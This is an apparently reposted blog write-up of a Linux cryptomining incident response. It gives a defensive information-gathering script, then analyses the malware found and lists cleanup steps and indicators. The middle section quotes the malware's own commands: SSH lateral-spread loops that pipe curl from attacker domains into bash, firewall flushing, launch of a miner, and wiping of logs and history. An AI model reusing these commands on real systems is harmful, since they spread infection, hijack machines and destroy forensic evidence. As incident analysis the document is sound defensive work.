Linux emergency response notes

Preface

The text and pictures in this article are from the Internet and are for learning and communication purposes only. They do not have any commercial use. If you have any questions, please contact us for processing.

PS: If you need Python learning materials, you can click on the link below to get it yourself

Python free learning materials and group communication answers Click to join

---

background

I dealt with an emergency response some time ago, and I also output an article Linux emergency response notes. In the past two days, we have dealt with a virus intrusion. Based on the previous one, some automated scripts were made for this emergency response. The efficiency of emergency response has been improved to a certain extent, so I made another note.
PS: This article focuses on sharing the emergency response experience. The malicious URL is retained in the article, but the download path of the malicious script and program is deleted. This article is only used for technical discussion and analysis, and is strictly prohibited for any illegal purposes. Violators are responsible for the consequences.

Emergency operation notes

Looking at my last Linux emergency response notes, I found that the list of so many commands is often dazzling and inconvenient to operate. It is better to write a shell script to automatically collect information.

Automated information collection

The script for my automated mobile phone information is as follows. The original intention of the script is to automate information collection without me connecting to the customer’s equipment to improve operation/communication efficiency.

#!/bin/bash

function initial(){
    echo "Doing initial"
    mkdir /tmp/GatherInfo    
    chmod +x ./chkrootkit
    chmod +x ./busybox
}

function chkrootkit_info(){
    echo "Doing chkrootkit"
    ./chkrootkit > /tmp/GatherInfo/chkrootkit.log 2>&1
}

function network_info(){
    echo "Gathering network info"
    netstat -tulnp > /tmp/GatherInfo/netstat_tulnp.log 2>&1
    netstat -anp > /tmp/GatherInfo/netstat_anp.log 2>&1
}

function process_info(){
    echo "Gathering process info"
    ps aux > /tmp/GatherInfo/ps_aux.log 2>&1
    ps auxef > /tmp/GatherInfo/ps_auxef.log 2>&1
    top -n 1 > /tmp/GatherInfo/top_n1.log 2>&1
}

function init_info(){
    echo "Gathering init info"
    chkconfig --list > /tmp/GatherInfo/chkconfig_list.log 2>&1
    ls -alt /etc/init* > /tmp/GatherInfo/ls_alt_etc_init.log 2>&1
}

function cron_info(){
    echo "Gathering cron info"
    cat /etc/crontab > /tmp/GatherInfo/crontab.log 2>&1
    cat /etc/anacrontab > /tmp/GatherInfo/anacrontab.log 2>&1
    crontab -l > /tmp/GatherInfo/crontab_l.log 2>&1

    cd /etc/cron.d/
    cat * > /tmp/GatherInfo/etc_cron.d.log 2>&1
    cd /etc/cron.daily/
    cat * > /tmp/GatherInfo/etc_daily.log 2>&1
    cd /etc/cron.hourly/
    cat * > /tmp/GatherInfo/etc_hourly.log 2>&1
    cd /etc/cron.monthly/
    cat * > /tmp/GatherInfo/etc_monthly.log 2>&1
    cd /etc/cron.weekly/
    cat * > /tmp/GatherInfo/etc_weekly.log 2>&1
    cd /var/spool/cron/
    cat * > /tmp/GatherInfo/var_spool_cron.log 2>&1
    cd /var/spool/anacron/
    cat * > /tmp/GatherInfo/var_spool_anacron.log 2>&1
}

function other_info(){
    echo "Gathering other info"
    cat /etc/passwd | grep -v nologin > /tmp/GatherInfo/passwd.log 2>&1
    ls -alt /tmp > /tmp/GatherInfo/tmp.log 2>&1
    ls -alt /var/tmp > /tmp/GatherInfo/var_tmp.log 2>&1
    ls -alt /dev/shm > /tmp/GatherInfo/dev_shm.log 2>&1
    echo $LD_PRELOAD > /tmp/GatherInfo/LD_PRELOAD.log 2>&1
    cat /etc/ld.so.preload > /tmp/GatherInfo/etc_ld.so.preload.log 2>&1
    s -alt /root/.ssh > /tmp/GatherInfo/ls_alt_root_.ssh.log 2>&1
    cat /root/.ssh/* > /tmp/GatherInfo/cat_root_.ssh.log 2>&1

    for user in /home/*
    do
        if test -d $user;then
            cat /$user/.ssh/* > /tmp/GatherInfo/cat_$user_.ssh.log 2>&1
        fi
    done
}

initial
chkrootkit_info
network_info
process_info
init_info
cron_info
other_info

cd /tmp
tar -zcvf GatherInfo.tar.gz GatherInfo

Analysis of information collection results

View the contents of all files under GatherInfo, the information collected automatically, and sort them out one by one according to the Checklist items below

Emergency Response Checklist

 

 

No abnormality was found during the investigation process and the network. When checking the crontab of the timing task, three abnormal timing tasks were found

59 * * * * root (curl -fsSL http://t.amynx.com/ ......
28 * * * * root (curl -fsSL http://t.jdjdcjq.top/ ......
13 * * * * root ps aux|grep lplp.ackng.com ......

I got the malicious script locally, this is a shell script, let’s analyze and see what this script does

Malicious script analysis

The malicious script has 439 lines of code. The first 300 lines are for deleting files and killing processes. I will briefly summarize a few pieces of code.

#/bin/bash
processes(){
    killme() {
      killall -9 chron-34e2fg;ps wx|awk '/34e|r\/v3|moy5|defunct/' | awk '{print $1}' | xargs kill -9 & > /dev/null &
    }

    killa() {
    what=$1;ps auxw|awk "/$what/" |awk '!/awk/' | awk '{print $2}'|xargs kill -9&>/dev/null&
    }

    killa 34e2fg
    killme

    killall \.Historys
    killall \.sshd
    killall neptune
    killall xm64
    killall xm32
    killall xmrig
    killall \.xmrig
    killall suppoieup

    # sshd
    ps ax | grep sshd | grep -v grep | awk '{print $1}' > /tmp/ssdpid
    while read sshdpid
    do
        if [ $(echo  $(ps -p $sshdpid -o %cpu | grep -v \%CPU) | sed -e 's/\.[0-9]*//g')  -ge 60 ]
        then
            kill $sshdpid
        fi
    done < /tmp/ssdpid
    rm -f /tmp/ssdpid

# Removing miners by known path IOC
files(){
    ulimit -n 65535
    rm -rf /var/log/syslog
    chattr -iua /tmp/
    chattr -iua /var/tmp/
    chattr -R -i /var/spool/cron
    chattr -i /etc/crontab
    ufw disable
    iptables -F
    echo "nope" >/tmp/log_rot
    sudo sysctl kernel.nmi_watchdog=0
    echo '0' >/proc/sys/kernel/nmi_watchdog
    echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
    rm /tmp/.cron
    rm /tmp/.main
    rm /tmp/.yam* -rf
    rm -f /tmp/irq

# Killing and blocking miners by network related IOC
network(){
    # Kill by known ports/IPs
    netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9

files
processes
network
echo "DONE"

Next is to download malicious binary programs and ssh lateral spread

代码片段1
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.amynx.com/ ......
fi

代码片段2
for file in /home/*
do
    if test -d $file; then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.amynx.com/ ...... |bash >/dev/null 2>&1 &' & done
        fi
    fi
done

代码片段3
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          i=$((i+1))
          if [ "${i}" -eq "20" ]; then
            sleep 20
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi
          #Wait 20 seconds after every 20 attempts and clean up hanging processes

          chmod +r $key
          chmod 400 $key
          echo "$user@$host $key $sshp"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "export src=sshcopy;(curl -fsSL http://t.amynx.com/ ...... |bash >/dev/null 2>&1 &"
        done
      done
    done
  done

The above three pieces of code are spread laterally through ssh certificate login.

if [ ! -d "/.Xll" ];then
    mkdir /.Xll
fi
cd /.Xll
if [ ! -f "./xr" ];then
    uname -a|grep x86_64 && (curl -fsSL d.ackng.com/ ......
fi
uname -a|grep x86_64 && ps aux|grep lplp.ackng.com |grep -v grep || ./xr -o lplp.ackng.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529

The above code is to download a malicious binary program, which should be the mining virus body.

Finally, clean up the traces

history -c
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
echo > /root/.bash_history

Clean up and restore

According to the logic of the malicious script, the cleanup steps are as follows: 1 Delete the crontab malicious timing task 2 Kill the ./xr process 3 Delete the /.Xll directory

Summary and reflection

Virus identification

目录及文件 /.Xll 和 /.Xll/xr

进程表示 ps aux | grep lplp.ackng.com

两个域 t.amynx.com， t.jdjdcjq.top

Mining threat is less than blackmail

Every time I encounter a virus intrusion, I have to panic. The mining virus is okay. The worst case is to reinstall the environment. The customer's data is safe. If it is a blackmail virus, it will be very difficult.

In any case, try to ensure system security and reduce the attack surface of system intrusion, which can greatly protect the system from being invaded.

Protection advice

Generally speaking, automated intrusions generally use very simple vulnerabilities, such as passwords, use of vulnerable components, unauthorized access, etc. Another way to infect viruses is ssh certificate authentication. As mentioned above, there are three methods for ssh horizontal propagation, and it seems that this method is still very popular. Therefore, for manufacturers, it is still necessary to properly control ssh certificate login.

Finally, I put the scripts and checklist used above in https://github.com/kafroc/emergency-response-toolbox  , readers in need can download and use, welcome any feedback.